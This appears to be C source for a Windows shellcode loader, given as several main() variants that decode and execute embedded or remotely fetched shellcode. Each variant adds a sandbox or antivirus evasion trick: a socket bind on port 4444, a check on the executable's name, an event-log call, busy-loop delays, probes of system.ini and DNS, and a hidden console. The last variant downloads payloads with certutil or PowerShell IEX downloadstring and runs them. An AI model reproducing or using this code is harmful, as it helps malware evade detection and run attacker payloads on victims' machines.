int main (int argc, char **argv)
{
unsigned char *shellcode;
unsigned char buffer[]="the encoded shellcode here";
int size = sizeof(buffer);
shellcode = decode_shellcode(buffer,shellcode,size);
exec_shellcode(shellcode);
}
int main (int argc, char **argv)
{
//unsigned char *buffer;
unsigned char *shellcode;
unsigned char buffer[]= "encrypted shellcode";
WSADATA WsaDat;
if(WSAStartup(MAKEWORD(2,2),&WsaDat)!=0)
{
WSACleanup();
return 0;
}
SOCKET Socket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(Socket==INVALID_SOCKET)
{
WSACleanup();
return 0;
}
SOCKADDR_IN serverInf;
serverInf.sin_family=AF_INET;
serverInf.sin_addr.s_addr=INADDR_ANY;
serverInf.sin_port=htons(4444);
if(bind(Socket,(SOCKADDR*)(&serverInf),sizeof(serverInf))==SOCKET_ERROR)
{
WSACleanup();
return 0;
}
listen(Socket,1);
SOCKET TempSock=SOCKET_ERROR;
while(TempSock==SOCKET_ERROR)
{
TempSock=accept(Socket,NULL,NULL);
}
Socket=TempSock;
char *szMessage="Welcome to the server!\r\n";
send(Socket,szMessage,strlen(szMessage),0);
shutdown(Socket,SD_SEND);
closesocket(Socket);
WSACleanup();
int size = sizeof(buffer);
shellcode = decode_shellcode(buffer,shellcode,size);
exec_shellcode(shellcode);
}
int main (int argc, char **argv)
{
unsigned char *shellcode;
unsigned char buffer[]= "strstr.c";
if(strstr(argv[0], "strstr.exe") > 0)
{
int size = sizeof(buffer);
shellcode = decode_shellcode(buffer,shellcode,size);
exec_shellcode(shellcode);
}
}
int main (int argc, char **argv)
{
unsigned char *shellcode;
unsigned char buffer[]= "encoded shellcode";
HANDLE h;
h = OpenEventLog( NULL, "Application");
if (h == NULL)
printf("error\n");
int size = sizeof(buffer);
shellcode = decode_shellcode(buffer,shellcode,size);
exec_shellcode(shellcode);
}
int main (int argc, char **argv)
{
//unsigned char *buffer;
unsigned char *shellcode;
unsigned char buffer[]= "encoded shellcode";
int x,y;
for (x=1; x<10000; x++)
{
for (y=1; y<10000; y++)
{
int a=cos(x);
int b=cos(y);
double c=sin(x);
double d=sin(y);
}
}
int size = sizeof(buffer);
shellcode = decode_shellcode(buffer,shellcode,size);
exec_shellcode(shellcode);
}
int main (int argc, char **argv)
{
#ifdef QUIET
ShowWindow(GetConsoleWindow(), SW_HIDE);
#endif
char *fvalue = NULL;
char *uvalue = NULL;
int index;
int c;
opterr = 0;
// do evading here with fopen technique
#ifdef SANDBOX_FOPEN
#ifdef PRINT_DEBUG
printf("use fopen sandbox escape\n");
#endif
FILE *fp = fopen("c:\\windows\\system.ini", "rb");
if (fp == NULL)
return 0;
fclose(fp);
#endif
//evading with gethostbyname technique
#ifdef KVALUE
#ifdef PRINT_DEBUG
printf("use gethostbyname sandbox evasion\n");
#endif
struct hostent *hp = gethostbyname(KVALUE);
if (hp != NULL)
exit(0);
#endif
//#if defined(DOWNLOADCERTUTIL) || defined(DOWNLOADPOWERSHELL)
//download a file and write to disk
#ifdef DOWNLOADCERTUTIL
char download[500]; //how not to do it...
sprintf(download,"certutil.exe -urlcache -split -f %s",argv[2]);
#ifdef PRINT_DEBUG
printf("url: %s\n", download);
#endif
system(download);
#ifdef PRINT_DEBUG
printf("download done\n");
#endif
#endif
#ifdef DOWNLOADPOWERSHELL
char download[500];
sprintf(download,"powershell.exe \"IEX ((new-object net.webclient).downloadstring('%s'))\"",argv[2]);
#ifdef PRINT_DEBUG
printf("url: %s\n", download);
#endif
system(download);
#endif
#ifdef LVALUE
fvalue=argv[1];
#endif
#ifdef PRINT_DEBUG
printf ("fvalue = %s ", fvalue);
printf ("uvalue = %s \n", uvalue);
for (index = optind; index < argc; index++)
printf ("Non-option argument %s\n", argv[index]);
#endif
// compute #defines from defs.h
#ifdef FVALUE
int size = strlen(FVALUE);
fvalue=(char*)malloc(size);
strcpy(fvalue,FVALUE);
#endif
#ifdef UVALUE
int size = strlen(UVALUE);
uvalue=(char*)malloc(size);
strcpy(uvalue,UVALUE);
#endif
// exec shellcode from a given file or from defs.h
if (fvalue)
{
unsigned char *buffer;
unsigned char *shellcode;
int size;
//#ifndef FVALUE
#ifdef LVALUE
#ifdef PRINT_DEBUG
printf("exec shellcode from file\n");
#endif
size = get_filesize(fvalue);
buffer = load_textfile(fvalue, buffer, size);
#endif
#ifdef FVALUE
size = strlen (FVALUE);
buffer = FVALUE;
#endif
#ifdef ENCRYPT
#ifdef PRINT_DEBUG
printf ("size %d\n",size);
//printf ("%s\n",FVALUE);
printf("exec shellcode with decode_shellcode\n");
#endif
shellcode = decode_shellcode(buffer,shellcode,size);
#endif
#ifndef ENCRYPT
#ifdef LVALUE
unsigned char *buf = buffer; //that does the trick, although not nice. Needed for raw sc execution with -l
#endif
#ifndef ASCIIMSF
#ifndef DOWNLOADEXECSC
#ifdef PRINT_DEBUG
printf("exec shellcode without decode_shellcode\n");
#endif
shellcode = buf;
#endif
#endif
#endif
#ifndef X64
#ifndef ASCIIMSF
exec_shellcode(shellcode);
#endif
#ifdef ASCIIMSF
exec_shellcode_ASCIIMSF(shellcode);
#endif
#endif
#ifdef X64
exec_shellcode64(shellcode);
#endif
}
// exec from url
#ifdef UVALUE
else if (uvalue)
{
#ifdef PRINT_DEBUG
printf("exec shellcode from url\n");
#endif
char *sh_filename;
sh_filename = ie_download(uvalue, sh_filename);
int x=strlen(sh_filename);
#ifdef PRINT_DEBUG
printf("\n\n%d\n\n", x);
#endif
unsigned char *buffer;
unsigned char *shellcode;
int size = get_filesize(sh_filename);
buffer = load_textfile(sh_filename, buffer, size);
#ifdef ENCRYPT
shellcode = decode_shellcode(buffer,shellcode,size);
#else
shellcode = buf;
#endif
#ifndef X64
exec_shellcode(shellcode);
#endif
#ifdef X64
exec_shellcode64(shellcode);
#endif
}
#endif
#ifdef DOWNLOADEXECSC
unsigned char *shellcode = downloadshellcode(argv[1]);
#ifndef X64
exec_shellcode(shellcode);
#endif
#ifdef X64
exec_shellcode64(shellcode);
#endif
#endif
return 0;
}
